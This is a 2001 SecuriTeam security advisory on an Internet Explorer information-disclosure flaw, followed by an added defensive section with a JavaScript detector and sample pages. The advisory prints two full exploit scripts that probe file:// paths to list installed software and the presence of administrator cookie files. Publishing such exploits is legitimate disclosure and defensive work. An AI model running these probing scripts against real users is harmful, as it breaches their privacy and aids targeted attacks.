[NT] Internet Explorer System Information Disclosure

From: support@securiteam.com
Date: 11/06/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Internet Explorer System Information Disclosure
Message-Id: <20011106160348.C1697138C0@mail.der-keiler.de>
Date: Tue,  6 Nov 2001 17:03:48 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Internet Explorer System Information Disclosure
------------------------------------------------------------------------

SUMMARY

A security vulnerability in the Internet Explorer product allows remote
sites to enumerate which programs are currently installed on the user's
computer: the page references files that belong to known applications via
file:// requests and observes whether each load succeeds or fails.

DETAILS

Exploit:
(note: in the HTML tag names below, the letter 'i' has been replaced with '!')

Example 1:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>

if(!document.all){alert('Ughh this is IE5+ specific')}

head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'

htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'

tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'

function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }

img=new Array
img[1]="LogicTech Cam,C:\\Program Files\\Logitech\\QuickCam\\Samples\\Henry.jpg"
img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif"
img[3]="Interdev,C:\\Program Files\\Microsoft Visual Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG"
img[4]="VisualC,C:\\Program Files\\Microsoft Visual Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP"
img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif"
img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat 4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif"
img[7]="Adobe PageMaker,C:\\Program Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF"
img[8]="MS Office,C:\\Program Files\\Microsoft Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF"
img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF"
img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"

n=1

function cycle(){
   
   if(n < img.length){
      dat=img[n].split(",")
      img[n]=dat[0]
      it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\" onerror=\"parent.nope(" + n + ")\">"
      ifrm.document.write(it)
      document.all.timer.innerText = img.length -n
      n=n+1
      setTimeout("cycle();",1000)
   }else{
      tbl=' '
      for(i=1;i<img.length;i++){
        tmp=img[i].split(",")
        tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
      }
      document.write(head+tbl+tail)
   }
}

cycle()
 
</script>

Example 2:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>

<scr!pt>

if(!document.all){alert('Ughh this is IE5+ specific')}

head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'

htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
        '<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
        '</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'

tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'

function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }
function test() { alert('hey there'+n) }

img=new Array
img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt"
img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt"
img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt"
img[4]="NT-Admin(google cookie),C:\\Documents and Settings\\Administrator\\Cookies\\administrator@google[1].txt"
img[5]="NT-Admin(hotmail cookie),c:\\Documents and Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt"
img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml"
img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt"
img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT"
img[9]="Php,C:\\PHP\\install.txt"
img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt"

n=1

function cycle(){
   
   if(n < img.length){
      dat=img[n].split(",")
      img[n]=dat[0]
      it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\">" //onerror='test()'>"
      ifrm.document.write(it)
      document.all.timer.innerText = img.length -n
      n=n+1
      setTimeout("cycle();",1000)
   }else{
      tbl=' '
      for(i=1;i<img.length;i++){
        if(img[i].indexOf('src=') < 1){ nope(i) }
        tmp=img[i].split(",")
        tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
      }
      document.write(head+tbl+tail)
   }
}

cycle()
 
</script>
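
Both examples above probe for files of known applications with file:// URLs and read the result out of the onload/onerror handlers, building the probing tags at runtime with document.write. The following check is an added example for the defending side and is not part of the advisory or of dzzie's code: it scans an HTML document for <img>/<iframe> tags whose src points at a local drive or UNC path via file://, and separately for <script> blocks that combine a file:// reference with load/error handlers, since a literal-tag scan alone misses the dynamically written form used above. The function names, the two sample pages and the placeholder paths in them are constructed for this example.

```javascript
// Added example, not from the advisory: a content-filter style check that flags
// HTML which probes local files through file:// URLs in <img>/<iframe> tags,
// either as literal tags or assembled inside <script> blocks at runtime.
// All names, sample pages and paths below are constructed for this example.

const TAG_RE = /<(img|iframe)\b[^>]*>/gi;
const SRC_RE = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const HANDLER_RE = /\bon(load|error)\s*=/gi;
// file:// followed by a drive letter (C:) or a UNC prefix (\\) points at the local machine.
const LOCAL_PATH_RE = /^file:\/{2,}(?:[a-z]:|\\\\)/i;
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;

// Literal <img>/<iframe> tags whose src is a local file:// URL, together with
// the load/error handlers attached to them (the side channel the advisory uses).
function findLocalFileProbes(html) {
  const findings = [];
  let m;
  while ((m = TAG_RE.exec(html)) !== null) {
    const tag = m[0];
    const s = SRC_RE.exec(tag);
    if (!s) continue;
    const src = s[1] || s[2] || s[3] || '';
    if (!LOCAL_PATH_RE.test(src)) continue;
    const handlers = [];
    let h;
    // exec() with the g flag resets lastIndex to 0 once it returns null
    while ((h = HANDLER_RE.exec(tag)) !== null) handlers.push(h[1].toLowerCase());
    findings.push({ element: m[1].toLowerCase(), src: src, handlers: handlers });
  }
  return findings;
}

// Scripts that both reference file:// and hook load/error events are the
// dynamic form of the same probe (tags emitted with document.write).
function findDynamicProbeScripts(html) {
  const hits = [];
  let m;
  while ((m = SCRIPT_RE.exec(html)) !== null) {
    const js = m[1];
    if (/file:\/\//i.test(js) && /\bon(load|error)\b/i.test(js)) hits.push(js.trim());
  }
  return hits;
}

function summarize(html) {
  const staticProbes = findLocalFileProbes(html).length;
  const dynamicProbeScripts = findDynamicProbeScripts(html).length;
  return {
    staticProbes: staticProbes,
    dynamicProbeScripts: dynamicProbeScripts,
    verdict: staticProbes + dynamicProbeScripts > 0 ? 'suspicious' : 'clean'
  };
}

// Constructed sample page in the shape of the advisory's examples; the paths are
// placeholders, not real product files.
const SUSPICIOUS_PAGE = [
  '<iframe src="about:blank" id="ifrm" height=1 width=1></iframe>',
  '<img src="file://C:\\Example\\placeholder.gif" onload="parent.yup(1)" onerror="parent.nope(1)">',
  '<script>',
  '  path = "C:\\\\Example\\\\probe.txt";',
  '  it = "<iframe src=\'file://" + path + "\' onload=\\"parent.yup(2)\\">";',
  '  ifrm.document.write(it);',
  '</script>'
].join('\n');

// Constructed benign page: a normal image with an onload handler and a plain script.
const BENIGN_PAGE = '<img src="/static/logo.png" onload="ready()"><script>var x = 1;</script>';

console.log(summarize(SUSPICIOUS_PAGE)); // { staticProbes: 1, dynamicProbeScripts: 1, verdict: 'suspicious' }
console.log(summarize(BENIGN_PAGE));     // { staticProbes: 0, dynamicProbeScripts: 0, verdict: 'clean' }
```

The literal-tag scan on its own reports only the first probe in the sample, because the second tag is concatenated from a variable and its src attribute is not a complete file:// URL until the script runs; the script-block check catches that form by its combination of a file:// string with load/error hooks. Modern browsers refuse to load file:// resources from an http(s) origin at all, which is the mitigation that closed this class of probe.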

ADDITIONAL INFORMATION

The information has been provided by <mailto:dzzie@yahoo.com> dzzie.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


